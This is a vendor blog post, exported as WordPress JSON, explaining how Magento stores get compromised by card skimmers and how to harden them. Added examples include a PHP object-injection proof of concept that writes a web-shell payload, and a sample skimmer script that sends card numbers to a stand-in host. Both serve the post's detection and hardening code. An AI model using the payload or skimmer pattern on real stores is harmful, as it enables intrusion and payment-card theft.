{"id":9920,"date":"2018-11-13T14:09:20","date_gmt":"2018-11-13T14:09:20","guid":{"rendered":"https:\/\/www.webscale.com\/?post_type=blog&p=9920"},"modified":"2023-12-29T08:30:27","modified_gmt":"2023-12-29T13:30:27","slug":"online-merchants-guide-securing-magento-storefronts","status":"publish","type":"post","link":"https:\/\/www.webscale.com\/blog\/online-merchants-guide-securing-magento-storefronts\/","title":{"rendered":"The Online Merchant\u2019s Guide to Securing Magento Storefronts"},"content":{"rendered":"

Magento recently confirmed<\/a> that about 5,000 Magento Open Source stores were hit by a single malware campaign. According to a Magento spokesperson, the sites were infected with MagentoCore, a payment-card skimming script; the attackers behind it typically got in by brute-forcing weak admin passwords and then planted the script on the storefront.<\/p>\n

A notorious hacker group is exploiting<\/a> a long list of zero-day vulnerabilities in popular Magento extensions to inject digital skimming code into e-commerce sites. The common root cause is that the extensions pass attacker-controlled input to PHP\u2019s unserialize() function. Because unserialize() will instantiate any class named in its input (PHP object injection), the attacker can create objects whose magic methods, such as __wakeup() or __destruct(), do the work of writing the attacker\u2019s own PHP code into the site.<\/p>\n
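As an added illustration (not code from the original post, from Magento or from any of the affected extensions), here is the mechanism in miniature: a hypothetical class with a file-writing destructor stands in for the gadget an attacker would find in a real code base, a handler that calls unserialize() on request input sits beside the hardened form, and a constructed payload turns the first into a file write while leaving the second harmless. It requires PHP 8 and writes only to the system temp directory.<\/p>\n

```php
<?php
// Added illustration of PHP object injection through unserialize(); not code
// from Magento or from any extension. The class, the handlers and the
// serialized payload are all hypothetical and only show the mechanism.

// A "gadget": any class already in the application whose magic methods act on
// attacker-influenced properties. Vulnerable plugins commonly ship cache or
// template classes whose __destruct() or __wakeup() writes a file.
class CacheWriter
{
    public string $path;
    public string $body;

    public function __destruct()
    {
        // In a real gadget this lands a .php file inside the web root.
        file_put_contents($this->path, $this->body);
    }
}

// Vulnerable: a request parameter goes straight into unserialize().
// Any autoloadable class can be instantiated with attacker-chosen properties.
function vulnerableHandler(string $untrusted): mixed
{
    return unserialize($untrusted);
}

// Hardened: refuse to instantiate objects at all. Scalars and arrays survive;
// every object comes back as __PHP_Incomplete_Class and no magic method runs.
// Better still, use json_decode() for anything that crosses a trust boundary.
function hardenedHandler(string $untrusted): mixed
{
    return unserialize($untrusted, ['allowed_classes' => false]);
}

// Constructed payload: a serialized CacheWriter whose destructor writes PHP
// code to a path the attacker picks (a temp file here, so the demo is harmless).
$target  = sys_get_temp_dir() . '/shell_demo.php';
$code    = '<?php system($_GET["cmd"]); ?>';
$payload = sprintf(
    'O:11:"CacheWriter":2:{s:4:"path";s:%d:"%s";s:4:"body";s:%d:"%s";}',
    strlen($target), $target, strlen($code), $code
);

@unlink($target);
vulnerableHandler($payload);     // object is created, discarded, destructed: file written
var_dump(file_exists($target));
@unlink($target);

$obj = hardenedHandler($payload); // __PHP_Incomplete_Class: destructor never runs
var_dump($obj instanceof __PHP_Incomplete_Class, file_exists($target));
```

Run it with php on the command line: the first var_dump reports true (the destructor wrote the file), the second reports true and false (the object came back as __PHP_Incomplete_Class and nothing was written). The allowed_classes option is the minimum fix; the real fix is to never call unserialize() on data from a request, a cookie or a cache an attacker can write to, and to use JSON instead.<\/p>\n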

While such news might sound like big revelations to some e-commerce business owners, the reality is that Magento exploits are fairly common. Given the tooling available to attackers today, compromising an unpatched Magento storefront is remarkably simple.<\/p>\n

Not your problem? Think again.<\/h3>\n

These attacks can be prevented, but it\u2019s your<\/em> responsibility to prevent them.<\/p>\n

The issue is that many e-commerce merchants<\/a> don\u2019t realize this. They assume that because card data is entered into a third party\u2019s payment form, they are not responsible if it is stolen.<\/p>\n

However, any attack executed through your website is your<\/em> responsibility: even when a payment provider hosts the card form, the page that loads it is still in scope for PCI DSS, and a skimmer running on that page sees everything the customer types. Once a breach has happened, the loss of brand, revenue and customer loyalty is just the beginning. In the US the Secret Service investigates payment card fraud, so you can expect a visit, and the card brands can fine you through your acquirer or revoke your ability to accept cards at all.<\/p>\n

Anatomy of an attack<\/h3>\n

Step 1 \u2013 Gaining admin access:<\/strong> Attackers leverage unpatched Magento vulnerabilities, or brute-force weak admin credentials, to gain admin access to a site.<\/p>\n

When Magento identifies a vulnerability, they publish it \u2013 along with a security patch. The first thing merchants must do is apply the patch; many don\u2019t, and fall further behind with every release. Attackers, on the other hand, always<\/em> keep up with security patches: each one tells them exactly which flaw to look for. They know a good share of merchants won\u2019t install the patch in time, so they compile lists of the corresponding exploits and rent botnets to run targeted probes that identify which sites are still vulnerable and where they can gain admin access.<\/p>\n

This is easier than you think. A list of all public Magento websites can be bought cheaply, and renting a botnet to scan every one of them for the published vulnerabilities costs very little.<\/p>\n

Once attackers have admin access, they can change anything on the site: configuration, CMS content, templates and uploaded files.<\/p>\n

Step 2 \u2013 Inserting malicious code:<\/strong> Most attackers are not interested in defacing a site \u2013 that\u2019s not valuable. They\u2019re interested in stealing credit card information.<\/p>\n

Once hackers have admin access, they embed a script tag that loads JavaScript from a domain they control in some obscure part of your site, like the header and footer HTML fields in the design configuration, a CMS block, or a theme template, where it\u2019s unlikely you\u2019ll notice it (unless you\u2019re regularly looking for it).<\/p>\n

Browsers load third-party assets all the time, and a browser has no way to tell a script tag you wrote from one the attacker inserted: both come from a trusted source \u2013 your website \u2013 and both run with full access to the page, including the checkout form.<\/p>\n

Once the browser runs the injected JavaScript, the code can read data (such as credit card details) out of the page and send it to a server elsewhere, typically disguised as an image request or a POST to a look-alike domain. One common technique is to record keystrokes, or hook the form\u2019s submit event, as you type in your credit card information; the legitimate payment still goes through, so nobody notices.<\/p>\n
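As an added check (example code, not something from the original post or from Magento), the function below scans an HTML fragment for script tags that load from a host outside an allowlist and for inline scripts that touch card fields or input events. The sample footer, the hostnames and the allowlist are constructed; in a real audit you would feed it the values stored in core_config_data under design/head/includes and design/footer/absolute_footer, the content column of cms_block, and your theme\u2019s templates.<\/p>\n

```php
<?php
// Added audit check, not code from the original post or from Magento: scan the
// HTML a store injects into every page for <script> tags that load from hosts
// outside an allowlist, or inline scripts that touch card fields. The sample
// fragment and all hostnames below are constructed for the demo.

/**
 * Return a list of findings for one HTML fragment.
 * $allowedHosts: hosts whose scripts are expected (your own domain, your CDN,
 * your payment provider, your tag manager). Anything else is reported.
 */
function findSuspiciousScripts(string $html, array $allowedHosts): array
{
    $findings = [];
    $doc = new DOMDocument();
    // Fragments are not full documents; silence libxml's complaints about that.
    libxml_use_internal_errors(true);
    $doc->loadHTML('<html><body>' . $html . '</body></html>');
    libxml_clear_errors();

    foreach ($doc->getElementsByTagName('script') as $script) {
        $src = $script->getAttribute('src');
        if ($src !== '') {
            // Protocol-relative URLs ("//evil.example/x.js") must be resolved too.
            $url  = str_starts_with($src, '//') ? 'https:' . $src : $src;
            $host = parse_url($url, PHP_URL_HOST);
            if ($host === null || $host === false) {
                continue; // relative path: served by this site itself
            }
            if (!in_array(strtolower($host), $allowedHosts, true)) {
                $findings[] = "external script from unexpected host: $host ($src)";
            }
            continue;
        }
        // Inline script: flag anything that reads checkout fields or installs
        // keystroke / form-submit hooks, which is how a skimmer harvests data.
        $body = $script->textContent;
        if (preg_match('/cc_number|card_number|cvv|keydown|keypress|addEventListener\\(["\']submit/i', $body)) {
            $findings[] = 'inline script references payment fields or input events: '
                . substr(trim($body), 0, 60);
        }
    }
    return $findings;
}

// Constructed sample footer block: one legitimate tag-manager include and two
// planted skimmer hooks of the kind described above (hostnames are made up).
$sampleFooter = <<<'HTML'
<div class="footer-links">...</div>
<script src="https://www.googletagmanager.com/gtm.js?id=GTM-XXXX"></script>
<script src="//static-analytics-cdn.example/js/jquery.min.js"></script>
<script>
  document.addEventListener('submit', function () {
    var n = document.getElementById('cc_number').value;
    new Image().src = 'https://collect.example/i.gif?d=' + btoa(n);
  });
</script>
HTML;

$allowed = ['shop.example.com', 'cdn.shop.example.com', 'www.googletagmanager.com'];
foreach (findSuspiciousScripts($sampleFooter, $allowed) as $finding) {
    echo $finding, PHP_EOL;
}
```

The two planted items in the sample are reported; the tag-manager include is not. The host check is the important part: skimmers are almost always loaded from a domain chosen to look like a CDN or analytics vendor, which is why the allowlist should be short and explicit rather than a denylist of known-bad names. Run the check on a schedule and diff the output, because a clean baseline followed by a new finding is the earliest signal you will get.<\/p>\n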

This is really the essence of a Magento attack \u2013 hackers and cybercriminals just keep finding new ways to do it.<\/p>\n

Step 3 \u2013 Credit card abuse:<\/strong> After stealing confidential credit card information, cybercriminals can buy products online and have them shipped globally. They can also run card testing: hundreds of small purchases against the stolen numbers to find out which ones still work, after which the \u201csuccessful\u201d cards are resold to organized crime rings.<\/p>\n

Most major attacks in e-commerce target the Magento platform \u2013 partly because its install base is large and many stores run unpatched, and partly because attackers can leverage the false confidence merchants tend to have that card security is someone else\u2019s job. So, how do you prevent these?<\/p>\n

4 things to do to make your Magento site significantly more secure<\/h3>\n
    \n
  1. Whitelist access to your admin:<\/strong> Attackers know exactly what to install once they have admin access, so deny it to them by default. Restrict the admin path to a whitelist of addresses (office, VPN) for a small set of site administrators, enforced at the web server or WAF rather than only inside the application. Also, regularly review and audit who holds admin accounts and which addresses are on the list.<\/li>\n
  2. Prevent unauthorized PHP execution:<\/strong> After you\u2019ve whitelisted the IPs that have admin access, make sure the web server only hands Magento\u2019s known entry points to PHP. A .php file dropped into a media, upload or var directory must never execute; otherwise a single file upload becomes a web shell.<\/li>\n
  3. Mitigate malicious bots:<\/strong> Most sophisticated attacks are initiated by malicious bots, and you should be able to prevent them from reaching the application infrastructure. Solutions such as Webscale\u2019s Cloud Bot Manager<\/a> ensure that such bot attacks are identified and blocked, in real time, using a combination of techniques such as IP reputation-based filtering, user agent based identification, behavioral analysis based on machine learning, anomaly patterns, and browser tests.<\/li>\n
  4. Work with a Security Partner:<\/strong> Security is an arms race. Make sure you have a diligent security partner that applies your security patches on a regular basis \u2013 faster than hackers can take advantage of them. Also, ensure this partner has robust cybersecurity capabilities \u2013 sophisticated technology and the right people \u2013 to provide you with 360-degree security<\/a> for your web application infrastructure \u2013 at the origin and the edge.<\/li>\n<\/ol>\n
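As an added example of what items 1 and 2 look like at the web-server level (not configuration from the original post; modelled on, but not copied from, the entry-point pattern in Magento 2\u2019s nginx.conf.sample), the fragment below assumes a Magento 2 store served from pub/, an admin path of /admin, an upstream named fastcgi_backend, and two placeholder office/VPN addresses.<\/p>\n

```nginx
# Added example; not configuration from the original post. Assumptions: a
# Magento 2 document root of pub/, admin path /admin (change to your custom
# admin URL), an upstream named fastcgi_backend defined elsewhere, and
# placeholder office/VPN egress addresses 203.0.113.10 and 198.51.100.0/24.

# 1. Admin whitelist, enforced in front of PHP: requests from any other address
#    never reach the application, so a leaked password alone is not enough.
location ~* ^/admin(/|$) {
    allow 203.0.113.10;
    allow 198.51.100.0/24;
    deny  all;
    try_files $uri $uri/ /index.php$is_args$args;
}

# 2. No PHP execution anywhere an attacker might be able to write: a .php file
#    dropped into media/, static/ or var/ is refused outright.
location ~* ^/(media|static|var)/.*\.php$ {
    deny all;
}

# Only the known Magento entry points are handed to PHP-FPM.
location ~ ^/(index|get|static|errors/report|errors/404|errors/503|health_check)\.php$ {
    fastcgi_pass   fastcgi_backend;
    fastcgi_index  index.php;
    include        fastcgi_params;
    fastcgi_param  SCRIPT_FILENAME $document_root$fastcgi_script_name;
}

# Any other .php path falls through to here and is refused.
location ~ \.php$ {
    deny all;
}
```

Test the whitelist from an address that is not on it and confirm you get 403 before you rely on it, and remember that it protects the admin UI only: the REST and GraphQL endpoints under /rest and /graphql still need their own controls.<\/p>\n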

    Lack of security is a very real problem. If 5,000 Magento sites can be hit by one malware campaign, that gives a sense of how big the problem is.<\/p>\n

    Sure, it\u2019s a small part of Magento\u2019s user base, but the bad guys are monitoring the whole Magento universe for exploits. That means your site could be under surveillance today, by hackers looking for a way in.<\/p>\n

    Every Magento storefront needs a comprehensive security strategy \u2013 with advanced technology and the right partner. If you don\u2019t, you\u2019re taking a huge risk. For a free assessment of your online storefront\u2019s security, fill out this form<\/a> or drop us an email at sales@webscalenetworks.com<\/a>.<\/p>\n

    You can also check out the session I presented at Meet Magento New York this year, along with Brent from Wagento, about how we’re helping merchants improve their security ahead of Black Friday. Watch the video here<\/a>.<\/p>\n","protected":false},"excerpt":{"rendered":"

    Magento recently confirmed that their e-commerce platform suffered a massive malware attack that impacted about 5,000 Magento Open Source users. According to a Magento spokesperson, the sites were infected with MagentoCore, a malicious payment card data-stealing script designed to uncover simple passwords and compromise Magento websites. A notorious hacker group is exploiting a long list […]<\/p>\n","protected":false},"author":4,"featured_media":256289,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","categories":[1,25,7],"tags":[],"class_list":["post-9920","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-blog","category-magento-adobe","category-security"],"acf":[],"_links":{"self":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/posts\/9920"}],"collection":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/comments?post=9920"}],"version-history":[{"count":0,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/posts\/9920\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/media\/256289"}],"wp:attachment":[{"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/media?parent=9920"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/categories?post=9920"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.webscale.com\/wp-json\/wp\/v2\/tags?post=9920"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}